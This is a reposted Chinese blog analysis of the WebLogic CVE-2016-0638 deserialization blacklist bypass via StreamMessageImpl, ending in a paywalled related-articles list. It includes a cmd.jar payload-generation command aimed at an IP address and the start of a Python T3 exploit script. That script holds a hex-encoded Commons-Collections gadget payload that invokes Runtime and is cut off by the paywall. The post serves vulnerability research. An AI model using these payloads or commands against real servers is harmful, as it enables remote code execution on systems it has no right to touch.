weblogic之CVE-2016-0638反序列化分析

最新推荐文章于 2022-10-11 15:06:15 发布
转载 最新推荐文章于 2022-10-11 15:06:15 发布 · 4.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/afanti/p/10240217.html
文章标签:

#数据库 #java

本文详细分析了CVE-2016-0638漏洞,该漏洞是针对CVE-2015-4852黑名单绕过的利用。攻击者通过构造恶意的ObjectInputStream,利用WebLogic中的StreamMessageImpl类的readExternal方法进行反序列化攻击。文中介绍了漏洞的触发点、POC生成过程以及相关gadgets,提供了参考链接和payload示例。

此漏洞是基于CVE-2015-4852漏洞进行黑名单的绕过,CVE-2015-4852补丁主要应用在三个位置上

weblogic.rjvm.InboundMsgAbbrev.class :: ServerChannelInputStream
weblogic.rjvm.MsgAbbrevInputStream.class
weblogic.iiop.Utils.class

所以如果能找到可以在其readObject中创建自己的InputStream的对象,并且不是使用黑名单中的ServerChannelInputStream和MsgAbbrevInputStream的readExternal进行的反序列化,最后调用readObject()方法进行反序列化的数据的读取,这样就可以执行含有恶意代码的序列化代码。CVE-2016-0638漏洞就是依据这个思路找到了weblogic.jms.common.StreamMessageImpl类,其中的readExternal()方法也符合攻击的需求。攻击者可以在其中构造一个恶意的ObjectInputStream来实现payload内部的InputStream创建,调用readObject()方法,实现攻击。

StreamMessageImpl类漏洞代码位置如下:
Alt text
先看一下poc是怎么生成的,从下面参考链接下载cmd.jar源码。通过配置如下参数,下断跟踪一下。不加-T默认使用StreamMessageImpl绕过

java -jar cmd.jar -H "121.195.170.207" -C "calc" -B -os win

Alt text
跟入executeBlind函数,继续跟入blindExecute
Alt text
在44行打印Payload,serialBlindDatas这个函数就是具体的反序列化操作。
Alt text
这里选择的绕过类型streamMessageImpl,返回payload
Alt text
streamMessageImpl类的writeExternal方法重写
Alt text
使用的gagets是common-collections1
Alt text
生成的payload:
Alt text
将PAYLOAD字典第一个位置CVE-2016-0638写入payload.

#!/usr/bin/env python
#coding:utf-8
import socket
import time
import re
import argparse
from multiprocessing.dummy import Pool

VUL=['CVE-2016-0638',
    'CVE-2016-3510',
    'CVE-2017-3248',
    'CVE-2018-2628',
    'CVE-2018-2893'
    ]
PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000004001e200000000000000100000572aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e000000027672
最低0.47元/天 解锁文章

200万优质内容无限畅学
Java反序列化(之)Weblogic反序列化系列 CVE-2016-0638 分析
Vicl1fe的博客
04-01 1949
前言
Java反序列化(之)Weblogic反序列化系列 CVE-2016-3510 分析
Vicl1fe的博客
04-01 1253
前言 之前也提到了CVE-2016-3510,他也是针对于CVE-2015-4852的黑名单绕过,其实具体的原理和CVE-2016-3608是一样的 最好先看看CVE-2016-3510 CVE-2016-3510 CVE-2016-3510使用的绕过类是weblogic.corba.utils.MarshalledObject,首先查看该类的构造方法, 构造方法接收一个Object类型的参数var1,最后转为转为字节数组赋值给this.objBytes 继续查看readResolve方法,发现这里会直接
weblogic漏洞分析CVE-2016-0638
洋洋的小黑屋
08-17 2473
weblogic漏洞分析CVE-2016-0638 一、环境搭建: 这里使用前一篇文章的环境,然后打上补丁 上一篇文章:https://www.cnblogs.com/yyhuni/p/15137095.html 下载补丁p20780171_1036_Generic和p22248372_1036012_Generic 解压补丁后,复制补丁到Docker中: docker cp ./p22248372_1036012_Generic/ d1b6be39e32e:/home/ docker cp ./p2
WebLogic基于T3协议的反序列化 CVE-2016-0638/CVE-2016-3510
01-29 5455
WebLogic基于T3协议的反序列化 CVE-2016-0638/CVE-2016-3510 CVE-2016-0638 是前面分析CVE-2015-4852 的一个绕过,通过找到一个不在黑名单中的类,且这个类存在readObject/readResolve/readExternal 方法,并且恰好这些方法里面有一些数据进行反序列化操作,那么这时我们就可以把原生的序列化数据封装到这个类里面,通过调用反序列化对象重写的readObject/readResolve/readExternal 方法这一特点来
weblogic0638_weblogicCVE-2016-0638反序列化分析
weixin_39787089的博客
12-20 617
此漏洞是基于CVE-2015-4852漏洞进行黑名单的绕过,CVE-2015-4852补丁主要应用在三个位置上weblogic.rjvm.InboundMsgAbbrev.class :: ServerChannelInputStreamweblogic.rjvm.MsgAbbrevInputStream.classweblogic.iiop.Utils.class所以如果能找到可以在其readO...
WebLogic反序列化CVE-2015-4852、CVE-2016-0638CVE-2016-3510
qq_40710190的博客
07-14 945
weblogic的3个基础cve
Ajax基础
weixin_43165525的博客
09-08 208
BIGO面试之Ajax基础 什么是Ajax? Ajax是异步Javascript和xml,是一种用于创建快速动态网页的技术,通过后台与服务器进行少量数据交换,ajax 可以使网页异步刷新,这意味着可以在不重新加载整个网页的的情况下,对网页的某部分进行更新。 工作原理: 浏览器:事件触发,创建xmlHttpRequest对象,发送httpRequest—>服务器:处理httpRequest,创建响应并把数据返回到浏览器----->浏览器:使用Js处理数据,更新页面内容 创建xmlHttpReque
weblogic反序列化_CVE20163510:Weblogic反序列化分析
weixin_39662594的博客
11-26 1068
更多全球网络安全资讯尽在邑安全影响范围Oracle WebLogic Server 12.2.1.0Oracle WebLogic Server 12.1.3.0Oracle WebLogic Server 12.1.2.0Oracle WebLogic Server 10.3.6.0演示环境Oracle WebLogic Server 10.3.6.0Windows 10.0.1836...
Weblogic反序列化漏洞(CVE-2016-3510)复现
玄道的网安博客
03-06 3447
简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 影响版本 Oracle WebLogic Server 12.2.1.0 、 12.1.3.0 、 12.1.2.0 、 10.3.6.0 环境搭建 下载地址 https://www.oracle.com/midd...
weblogic-CVE-2016-3510
博客地址 www.sec0nd.top
07-05 1625
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。这个漏洞是java反序列化的漏洞原理是将反序列化的对象封装进了weblogic.corba.utils.MarshalledObject,然后再对 MarshalledObject进行序列化。...
Weblogic 反序列化漏洞检查工具CVE-2017-10271.zip
07-09
Weblogic 反序列化漏洞检查工具CVE-2017-10271.zip
cve-check-tool, 原始自动CVE检查工具.zip
09-18
cve-check-tool, 原始自动CVE检查工具 cve-check-tool cve-check-tool,顾名思义,是一种检查已知( public ) 大小的工具。 工具将通过版本匹配识别Linux发行版中潜在的vunlnerable软件包。 如果可以能的话,它也会寻找(
weblogic反序列化漏洞学习记录
include_voidmain的博客
10-11 1147
weblogic反序列化漏洞学习记录
weblogic0638_关于Weblogic CVE-2016-3510、CVE-2016-0638 相关问题讨论
weixin_39520210的博客
12-20 223
# -*- coding: utf-8 -*-importsocketimporttimeimportre## @author iswin@threathunter.org# reffer: nessus#VUL=['CVE-2016-0638','CVE-2016-3510','CVE-2017-3248']PAYLOAD=['aced0005737200257765626c6f6769632e...
Weblogic相关漏洞
谢公子的博客
01-14 5085
目录 Weblogic Weblogic出现过的漏洞 SSRF(CVE-2014-4210) 任意文件上传(CVE-2018-2894) JAVA反序列化 CVE-2015-4852 CVE-2016-0638 CVE-2016-3510 CVE-2017-3248 Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2...
Weblogic处理流量中的java反序列化数据的流程(CVE-2015-4852、CVE-2016-0638CVE-2016-3510)
weixin_45682070的博客
03-08 2261
前言 想要搞明白weblogicT3协议中的反序列化和后续的反序列化绕过,就得先需要了解weblogic如何处理T3协议中的反序列化数据,了解流程之后再去分析CVE-2015-4852、CVE-2016-0638CVE-2016-3510这些漏洞,会事半功倍。 weblogic处理反序列化的流程 首先我们看一张流程图,这是weblogic处理反序列化数据的时候的函数调用图 截图比较粗糙,其起始位置是我们熟悉的ObjectInputStream类中的readObject方法。下面是一层层调用的函数,在红色
weblogic反序列化_从Weblogic原理上探究CVE20154852、CVE20160638CVE20163510究竟怎么一回事...
weixin_39612653的博客
11-29 1418
更多全球网络安全资讯尽在邑安全目前。网上关于CVE-2015-4852漏洞的资料很多,但是针对CVE-2015-4852漏洞如何修复,修复补丁又是如何生效的却少之又少;而CVE-2016-0638CVE-2016-3510这两个漏洞又是如何绕过CVE-2015-4852补丁的,则只是在介绍Weblogic系列漏洞时被一句话带过。CVE-2015-4852、CVE-2016-0638以及...
weblogic0638_盘点:Weblogic T3反序列化历史漏洞复现及分析
weixin_29192141的博客
01-12 760
本文是osword同学的Java安全学习笔记之一,将详细分析Weblogic历史,从CVE-2015至CVE-2019相关历史漏洞入手,记录学习Java反序列化漏洞的心得CVE-2015-4852影响版本Oracle WebLogic Server 12.2.1.0Oracle WebLogic Server 12.1.3.0Oracle WebLogic Server 12.1.2.0Oracl...
利用POC检测WebLogic反序列化漏洞CVE-2019-2725
在2019年,Oracle WebLogic服务器遭遇了一...总结起来,这段文本描述了一种针对WebLogic服务器的反序列化漏洞利用方法,以及提供了一个用于检测此漏洞的POC。理解并应用此类安全知识对于保护企业免受此类攻击至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值